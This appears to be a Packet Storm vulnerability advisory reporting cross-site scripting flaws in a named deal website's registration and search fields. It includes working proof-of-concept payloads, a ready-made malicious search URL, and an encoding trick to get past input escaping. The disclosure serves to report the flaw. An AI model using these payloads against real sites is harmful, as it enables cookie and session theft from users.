Dealgates.com is susceptible to cross site scripting attacks.
2f1eae9d0223e7d0e65b8f22ebef136ad87e13a086513ff524d81c970e81c464Dealgates.com
Homepage:
http://www.dealgates.com
Affected files:
*Input boxes when registering new account
* Search box
-------------------------------------
XSS vuln with cookie disclosure when registering a new account.
To bypass the adding backslashes to ; and ", we use the long UTF-8 unicode of '. PoC:
In the input boxes of "Your name:" and "Address".
<IMG SRC=javascript:alert('XSS')>
For the cookie:
<IMG SRC=javascript:alert(document.cookie)>
-----------------------------------
XSS vuln with cookie disclosure via search input box. For a PoC put:
">">">">">'>'>">"><<IMG SRC=javascript:alert(document.cookie)><"<"<"<"<'<'<"<"
URL:
https://www.dealgates.com/search.php?dealquery=%22%3E%22%3E%22%3E%22%3E%22%3E%27%3E%27%3E%22%3E%3CIMG+SRC%3Djavascript%3Aalert%28document.cookie%29%3E%3C%22%3C%27%3C%27%3C%27%3C%27%3C%27%3C%22&search_type=2
Screenshots:
http://www.youfucktard.com/xsp/dealgates1.jpg
http://www.youfucktard.com/xsp/dealgates2.jpg
http://www.youfucktard.com/xsp/dealgates3.jpg
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed